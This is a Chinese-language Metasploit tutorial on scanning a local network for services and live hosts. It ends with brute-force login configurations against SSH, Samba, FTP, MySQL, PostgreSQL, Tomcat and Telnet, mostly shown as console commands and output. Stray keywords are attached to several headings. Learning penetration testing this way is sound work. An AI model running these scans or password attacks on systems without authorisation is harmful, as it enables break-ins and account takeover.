MFS 服務掃描與爆破
MSF 服務發現
經常使用來發現局域網內,的常見服務,好比HTTP,FTP,TELNET等.php
MSF模塊搜索:mysql
[root@localhost ~]# msfconsole msf5 > search scanner type:auxiliary msf5 > search scanner/http type:auxiliary // 搜索全部與HTTP相關的模塊
發現HTTP服務: 基於scanner/http/http_version發現HTTP服務.sql
msf5 > use scanner/http/http_version msf5 auxiliary(scanner/http/http_version) > show options Module options (auxiliary/scanner/http/http_version): Name Current Setting Required Description ---- --------------- -------- ----------- Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS 192.168.1.0/24 yes The target address range or CIDR identifier RPORT 80 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections THREADS 1 yes The number of concurrent threads VHOST no HTTP server virtual host msf5 auxiliary(scanner/http/http_version) > set rhosts 192.168.1.0/24 rhosts => 192.168.1.0/24 msf5 auxiliary(scanner/http/http_version) > set rport 80 rport => 80 msf5 auxiliary(scanner/http/http_version) > exploit [+] 192.168.1.7:80 Apache/2.4.6 (CentOS) PHP/5.4.16 ( Powered by PHP/5.4.16, 302-login.php ) [+] 192.168.1.3:80 Apache/2.5.0 (CentOS) PHP/7.0.0 ( Powered by PHP/7.0.0, 302-admin.php ) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
發現SMB服務: 基於scanner/smb/smb_version發現SMB服務.windows
msf5 > use scanner/smb/smb_version msf5 auxiliary(scanner/smb/smb_version) > show options Module options (auxiliary/scanner/smb/smb_version): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.1.0/24 yes The target address range or CIDR identifier SMBDomain . no The Windows domain to use for authentication SMBPass no The password for the specified username SMBUser no The username to authenticate as THREADS 10 yes The number of concurrent threads msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.1.0/24 rhosts => 192.168.1.0/24 msf5 auxiliary(scanner/smb/smb_version) > set threads 10 threads => 10 msf5 auxiliary(scanner/smb/smb_version) > exploit [+] 192.168.1.2:445 - Host is running Windows 10 China (name:lyshark) (workgroup:lyshark) [*] 192.168.1.7:445 - Host could not be identified: Windows 6.1 (Samba 4.8.3) [*] 192.168.1.0/24:445 - Scanned 26 of 256 hosts (10% complete) [*] 192.168.1.0/24:445 - Caught interrupt from the console... [*] Auxiliary module execution completed
發現FTP服務: 基於scanner/ftp/ftp_version發現FTP服務tomcat
msf5 > use scanner/ftp/ftp_version msf5 auxiliary(scanner/ftp/ftp_version) > show options Module options (auxiliary/scanner/ftp/ftp_version): Name Current Setting Required Description ---- --------------- -------- ----------- FTPPASS mozilla@example.com no The password for the specified username FTPUSER anonymous no The username to authenticate as RHOSTS 192.168.1.0/24 yes The target address range or CIDR identifier RPORT 21 yes The target port (TCP) THREADS 10 yes The number of concurrent threads msf5 auxiliary(scanner/ftp/ftp_version) > set rhosts 192.168.1.0/24 rhosts => 192.168.1.0/24 msf5 auxiliary(scanner/ftp/ftp_version) > set threads 10 threads => 10 msf5 auxiliary(scanner/ftp/ftp_version) > exploit [+] 192.168.1.7:21 - FTP Banner: '220 (vsFTPd 3.0.2)\x0d\x0a' [*] 192.168.1.0/24:21 - Scanned 32 of 256 hosts (12% complete) [*] 192.168.1.0/24:21 - Caught interrupt from the console... [*] Auxiliary module execution completed
發現SSH服務: 基於auxiliary/scanner/ssh/ssh_version發現SSH服務bash
msf5 > use auxiliary/scanner/ssh/ssh_version msf5 auxiliary(scanner/ssh/ssh_version) > show options Module options (auxiliary/scanner/ssh/ssh_version): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.1.0/24 yes The target address range or CIDR identifier RPORT 22 yes The target port (TCP) THREADS 10 yes The number of concurrent threads TIMEOUT 30 yes Timeout for the SSH probe msf5 auxiliary(scanner/ssh/ssh_version) > set rhosts 192.168.1.0/24 rhosts => 192.168.1.0/24 msf5 auxiliary(scanner/ssh/ssh_version) > set threads 10 threads => 10 msf5 auxiliary(scanner/ssh/ssh_version) > exploit [+] 192.168.1.7:22 - SSH server version: SSH-2.0-OpenSSH_7.4 ( service.version=7.4 service.vendor=OpenBSD service.family=OpenSSH service.product=OpenSSH service.cpe23=cpe:/a:openbsd:openssh:7.4 service.protocol=ssh fingerprint_db=ssh.banner ) [*] 192.168.1.0/24:22 - Caught interrupt from the console... [*] Auxiliary module execution completed
發現Telnet服務: 基於auxiliary/scanner/telnet/telnet_version發現TELNET服務oracle
msf5 > use auxiliary/scanner/telnet/telnet_version msf5 auxiliary(scanner/telnet/telnet_version) > show options Module options (auxiliary/scanner/telnet/telnet_version): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username RHOSTS 192.168.1.0/24 yes The target address range or CIDR identifier RPORT 23 yes The target port (TCP) THREADS 10 yes The number of concurrent threads TIMEOUT 30 yes Timeout for the Telnet probe USERNAME no The username to authenticate as msf5 auxiliary(scanner/telnet/telnet_version) > set rhosts 192.168.1.0/24 rhosts => 192.168.1.0/24 msf5 auxiliary(scanner/telnet/telnet_version) > set threads 10 threads => 10 msf5 auxiliary(scanner/telnet/telnet_version) > exploit [-] 192.168.1.1:23 - A network issue has occurred: The connection was refused by the remote host (192.168.1.1:23). [-] 192.168.1.7:23 - A network issue has occurred: The connection was refused by the remote host (192.168.1.7:23). [-] 192.168.1.0:23 - A network issue has occurred: The host (192.168.1.0:23) was unreachable. [-] 192.168.1.10:23 - A network issue has occurred: The connection was refused by the remote host (192.168.1.10:23). [-] 192.168.1.3:23 - A network issue has occurred: The connection was refused by the remote host (192.168.1.3:23). [-] 192.168.1.5:23 - A network issue has occurred: The host (192.168.1.5:23) was unreachable. [*] 192.168.1.0/24:23 - Caught interrupt from the console... [*] Auxiliary module execution completed
發現MySQL服務: 基於auxiliary/scanner/mysql/mysql_version發現mysql服務app
msf5 > use auxiliary/scanner/mysql/mysql_version msf5 auxiliary(scanner/mysql/mysql_version) > show options Module options (auxiliary/scanner/mysql/mysql_version): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.1.7 yes The target address range or CIDR identifier RPORT 3306 yes The target port (TCP) THREADS 1 yes The number of concurrent threads msf5 auxiliary(scanner/mysql/mysql_version) > set rhosts 192.168.1.7 rhosts => 192.168.1.7 msf5 auxiliary(scanner/mysql/mysql_version) > set rport 3306 rport => 3306 msf5 auxiliary(scanner/mysql/mysql_version) > exploit [*] 192.168.1.7:3306 - 192.168.1.7:3306 is running MySQL, but responds with an error: \x04Host '192.168.1.7' is not allowed to connect to this MariaDB server [*] 192.168.1.7:3306 - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
發現MSSQL服務: 基於auxiliary/scanner/mssql/mssql_ping發現SQL Server服務dom
msf5 > use auxiliary/scanner/mssql/mssql_ping msf5 auxiliary(scanner/mssql/mssql_ping) > show options Module options (auxiliary/scanner/mssql/mssql_ping): Name Current Setting Required Description ---- --------------- -------- ----------- PASSWORD no The password for the specified username RHOSTS 192.168.1.0/24 yes The target address range or CIDR identifier TDSENCRYPTION false yes Use TLS/SSL for TDS data "Force Encryption" THREADS 10 yes The number of concurrent threads USERNAME sa no The username to authenticate as USE_WINDOWS_AUTHENT false yes Use windows authentification (requires DOMAIN option set) msf5 auxiliary(scanner/mssql/mssql_ping) > set rhosts 192.168.1.0/24 rhosts => 192.168.1.0/24 msf5 auxiliary(scanner/mssql/mssql_ping) > set threads 10 threads => 10 msf5 auxiliary(scanner/mssql/mssql_ping) > run
發現Oracle服務: 基於auxiliary/scanner/oracle/tnslsnr_version發現Oracle服務ssh
msf5 > use auxiliary/scanner/oracle/tnslsnr_version msf5 auxiliary(scanner/oracle/tnslsnr_version) > show options Module options (auxiliary/scanner/oracle/tnslsnr_version): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS 192.168.1.0/24 yes The target address range or CIDR identifier RPORT 1521 yes The target port (TCP) THREADS 10 yes The number of concurrent threads msf5 auxiliary(scanner/oracle/tnslsnr_version) > set rhosts 192.168.1.0/24 rhosts => 192.168.1.0/24 msf5 auxiliary(scanner/oracle/tnslsnr_version) > set threads 10 threads => 10 msf5 auxiliary(scanner/oracle/tnslsnr_version) > run
MSF 主機的發現
MSF提供了一些輔助模塊,能夠實現主機發現,這些模塊位於modules/auxiliary/scanner/discovery/目錄中,主要有如下幾個arp_sweep,ipv6_multicast_ping,ipv6_neighbor,ipv6_neighbor_router_advertisement,udp_probe,udp_sweep,接下來主要看經常使用的幾個模塊的使用技巧.
ARP發現內網主機: 基於scanner/discovery/arp_sweep發現內網存活主機.
msf5 > use scanner/discovery/arp_sweep msf5 auxiliary(scanner/discovery/arp_sweep) > show options Module options (auxiliary/scanner/discovery/arp_sweep): Name Current Setting Required Description ---- --------------- -------- ----------- INTERFACE no The name of the interface RHOSTS 192.168.1.0/24 yes The target address range or CIDR identifier SHOST no Source IP Address SMAC no Source MAC Address THREADS 10 yes The number of concurrent threads TIMEOUT 5 yes The number of seconds to wait for new data msf5 auxiliary(scanner/discovery/arp_sweep) > set rhosts 192.168.1.0/24 rhosts => 192.168.1.0/24 msf5 auxiliary(scanner/discovery/arp_sweep) > set threads 10 threads => 10 msf5 auxiliary(scanner/discovery/arp_sweep) > exploit [+] 192.168.1.1 appears to be up (UNKNOWN). [+] 192.168.1.2 appears to be up (UNKNOWN). [+] 192.168.1.2 appears to be up (UNKNOWN). [+] 192.168.1.1 appears to be up (UNKNOWN). [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed
UDP發現內網主機: 基於scanner/discovery/udp_sweep發現內網存活主機.
msf5 > use scanner/discovery/udp_sweep msf5 auxiliary(scanner/discovery/udp_sweep) > show options Module options (auxiliary/scanner/discovery/udp_sweep): Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to probe in each set RHOSTS 192.168.1.0/24 yes The target address range or CIDR identifier THREADS 10 yes The number of concurrent threads msf5 auxiliary(scanner/discovery/udp_sweep) > set rhosts 192.168.1.0/24 rhosts => 192.168.1.0/24 msf5 auxiliary(scanner/discovery/udp_sweep) > exploit [*] Sending 13 probes to 192.168.1.0->192.168.1.255 (256 hosts) [*] Discovered NetBIOS on 192.168.1.2:137 (lyshark:<20>:U :lysahrk:<00>:U :lyshark:<00>:G :WORKGROUP:<1e>:G :WORKGROUP:<1d>:U :__MSBROWSE__:<01>:G :a4:be:c8:fe:ac:z4) [*] Scanned 256 of 256 hosts (100% complete) [*] Auxiliary module execution completed
ACK發現內網主機: 基於auxiliary/scanner/portscan/ack掃描內網存活主機.
msf5 > use auxiliary/scanner/portscan/ack msf5 auxiliary(scanner/portscan/ack) > show options Module options (auxiliary/scanner/portscan/ack): Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to scan per set DELAY 0 yes The delay between connections, per thread, in milliseconds INTERFACE no The name of the interface JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds. PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS 192.168.1.7 yes The target address range or CIDR identifier SNAPLEN 65535 yes The number of bytes to capture THREADS 10 yes The number of concurrent threads TIMEOUT 500 yes The reply read timeout in milliseconds msf5 auxiliary(scanner/portscan/ack) > set rhosts 192.168.1.7 rhosts => 192.168.1.7 msf5 auxiliary(scanner/portscan/ack) > set threads 10 threads => 10 msf5 auxiliary(scanner/portscan/ack) > exploit [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
SYN發現內網主機: 基於auxiliary/scanner/portscan/syn掃描內網存活主機.
msf5 > use auxiliary/scanner/portscan/syn msf5 auxiliary(scanner/portscan/syn) > show options Module options (auxiliary/scanner/portscan/syn): Name Current Setting Required Description ---- --------------- -------- ----------- BATCHSIZE 256 yes The number of hosts to scan per set DELAY 0 yes The delay between connections, per thread, in milliseconds INTERFACE no The name of the interface JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds. PORTS 1-1024 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS 192.168.1.7 yes The target address range or CIDR identifier SNAPLEN 65535 yes The number of bytes to capture THREADS 10 yes The number of concurrent threads TIMEOUT 500 yes The reply read timeout in milliseconds msf5 auxiliary(scanner/portscan/syn) > set rhosts 192.168.1.7 rhosts => 192.168.1.7 msf5 auxiliary(scanner/portscan/syn) > set threads 10 threads => 10 msf5 auxiliary(scanner/portscan/syn) > run
TCP發現內網主機: 基於auxiliary/scanner/portscan/tcp掃描內網存活主機.
msf5 > use auxiliary/scanner/portscan/tcp msf5 auxiliary(scanner/portscan/tcp) > show options Module options (auxiliary/scanner/portscan/tcp): Name Current Setting Required Description ---- --------------- -------- ----------- CONCURRENCY 10 yes The number of concurrent ports to check per host DELAY 0 yes The delay between connections, per thread, in milliseconds JITTER 0 yes The delay jitter factor (maximum value by which to +/- DELAY) in milliseconds. PORTS 1-10000 yes Ports to scan (e.g. 22-25,80,110-900) RHOSTS 192.168.1.7 yes The target address range or CIDR identifier THREADS 10 yes The number of concurrent threads TIMEOUT 1000 yes The socket connect timeout in milliseconds msf5 auxiliary(scanner/portscan/tcp) > set rhosts 192.168.1.7 rhosts => 192.168.1.7 msf5 auxiliary(scanner/portscan/tcp) > set threads 10 threads => 10 msf5 auxiliary(scanner/portscan/tcp) > run [+] 192.168.1.7: - 192.168.1.7:21 - TCP OPEN [+] 192.168.1.7: - 192.168.1.7:22 - TCP OPEN [+] 192.168.1.7: - 192.168.1.7:80 - TCP OPEN [+] 192.168.1.7: - 192.168.1.7:139 - TCP OPEN [+] 192.168.1.7: - 192.168.1.7:445 - TCP OPEN [*] 192.168.1.7: - Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed
MSF 服務爆破
對於發現的服務,下一個目標就是嘗試爆破其登錄密碼,爆破是否可以成功,這裏須要有一個社工好了的字典,這裏只是演示幾個服務爆破的使用方法,這裏只演示爆破的配置,爆破時間過長,不作具體實驗.
SSH口令爆破:
use auxiliary/scanner/ssh/ssh_login set rhosts 192.168.1.7 set username root set pass_file /root/pass.txt set threads 10 exploit
Samba口令爆破:
use auxiliary/scanner/smb/smb_login set rhosts 192.168.1.7 set user_file /root/user.txt set pass_file /root/pass.txt set threads 10 exploit
FTP口令爆破:
use scanner/ftp/ftp_login set rhosts 192.168.1.7 set user_file /root/user.txt set pass_file /root/pass.txt set threads 10 exploit
MySQL口令爆破:
search mysql use auxiliary/scanner/mysql/mysql_login set rhosts 192.168.1.7 set user_file /root/user.txt set pass_file /root/pass.txt exploit
Postgresql口令爆破:
use auxiliary/scanner/postgres/postgres_login set rhosts 192.168.1.7 set user_file /root/user.txt set pass_file /root/pass.txt exploit
Tomcat口令爆破:
search tomcat use auxiliary/scanner/http/tomcat_mgr_login set rhosts 192.168.1.7 set user_file /root/user.txt set pass_file /root/pass.txt exploit
Telnet口令爆破:
use auxiliary/scanner/telnet/telnet_login set rhosts 192.168.1.7 set username administrator set pass_file /root/pass.txt exploit
相關文章
- 1. day10 掃描與爆破
- 2. 掃描與爆破(nmap與hydra)
- 3. 簡單掃描和爆破
- 4. 簡單的掃描與爆破
- 5. 網絡-安全-掃描與爆破-16
- 6. web安全工具 御劍站點目錄掃描爆破&DirBuster後臺目錄掃描爆破
- 7. 網絡安全學習篇15_掃描與爆破
- 8. 用shell實現自動化掃描主機端口爆破服務弱口令
- 9. metasploit服務掃描與查點
- 10. Metasploit服務掃描(HTTP、MYSQL)
- 更多相關文章...
- • 啓動MySQL服務 - MySQL教程
- • Git 服務器搭建 - Git 教程
- • Spring Cloud 微服務實戰(三) - 服務註冊與發現
- • Composer 安裝與使用
相關標籤/搜索
每日一句
-
每一个你不满意的现在,都有一个你没有努力的曾经。
最新文章
歡迎關注本站公眾號,獲取更多信息
